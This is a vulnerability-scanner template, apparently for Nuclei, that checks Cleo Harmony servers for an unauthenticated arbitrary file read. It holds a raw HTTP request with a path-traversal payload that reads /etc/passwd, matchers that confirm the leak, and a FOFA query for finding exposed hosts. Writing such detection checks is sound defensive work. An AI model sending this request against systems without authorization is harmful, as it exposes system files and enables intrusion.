http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - root:x
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Synchronization HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Retrieve: l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd
id: Cleo-Harmony-Synchronization-File-reading
info:
    author: Superhero
    description: |-
        fofa: server="Cleo"
        Cleo Harmony /Synchronization 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: Cleo Harmony /Synchronization存在任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/5Yq3zVq8HWGYU0UUW0mkjQ
    severity: high
    tags:
        - File reading
